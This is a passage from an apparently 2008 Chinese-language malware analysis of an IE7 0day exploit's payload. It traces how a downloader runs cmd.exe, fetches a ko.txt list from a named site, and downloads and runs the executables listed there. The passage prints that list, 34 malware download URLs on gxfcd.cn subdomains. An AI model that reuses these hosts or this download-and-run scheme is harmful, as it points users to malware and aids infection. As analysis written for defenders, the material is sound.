攻防实战:深入剖析最新IE7.0 0day漏洞利用代码
2008-12-16 13:42:01 来源:WEB开发网从filemon的监控过程来看,应该是调用了cmd.exe来执行ko.exe,如图6所示,ko.exe文件打开了cmd.exe来创建、查询和关闭一些文件。
图6 ko.exe调用cmd命令
(3)ko[1].exe下载文件分析
通过文件监视器,如图7所示,Ko[1].exe在临时文件夹中78767551中生成了一些新文件,通过分析发现该程序从网站http://www.fengtianc.cn/下再ko.txt文本文件,读取ko.txt文本中的内容后,下载文本中指定的文件并执行。
图7 ko[1].exe下载文件分析
到临时文件夹中找到ko.txt并打开该文件,从中可以发现34个可执行文件,其文件内容如下:
[file]
open=y
url1=http://222.gxfcd.cn/new/new1.exe
url2=http://222.gxfcd.cn/new/new2.exe
url3=http://222.gxfcd.cn/new/new3.exe
url4=http://222.gxfcd.cn/new/new4.exe
url5=http://222.gxfcd.cn/new/new5.exe
url6=http://222.gxfcd.cn/new/new6.exe
url7=http://222.gxfcd.cn/new/new7.exe
url8=http://222.gxfcd.cn/new/new8.exe
url9=http://222.gxfcd.cn/new/new9.exe
url10=http://222.gxfcd.cn/new/new10.exe
url11=http://222.gxfcd.cn/new/new11.exe
url12=http://222.gxfcd.cn/new/new12.exe
url13=http://222.gxfcd.cn/new/new13.exe
url14=http://222.gxfcd.cn/new/new14.exe
url15=http://222.gxfcd.cn/new/new15.exe
url16=http://333.gxfcd.cn/new/new16.exe
url17=http://333.gxfcd.cn/new/new17.exe
url18=http://333.gxfcd.cn/new/new18.exe
url19=http://333.gxfcd.cn/new/new19.exe
url20=http://333.gxfcd.cn/new/new20.exe
url21=http://333.gxfcd.cn/new/new21.exe
url22=http://333.gxfcd.cn/new/new22.exe
url23=http://333.gxfcd.cn/new/new23.exe
url24=http://333.gxfcd.cn/new/new24.exe
url25=http://333.gxfcd.cn/new/new25.exe
url26=http://333.gxfcd.cn/new/new26.exe
url27=http://333.gxfcd.cn/new/new27.exe
url28=http://333.gxfcd.cn/new/new28.exe
url29=http://333.gxfcd.cn/new/new29.exe
url30=http://333.gxfcd.cn/new/new30.exe
url31=http://444.gxfcd.cn/new/new31.exe
url32=http://444.gxfcd.cn/new/new32.exe
url33=http://444.gxfcd.cn/new/new33.exe
url34=http://444.gxfcd.cn/new/new34.exe
count=34
更多精彩
赞助商链接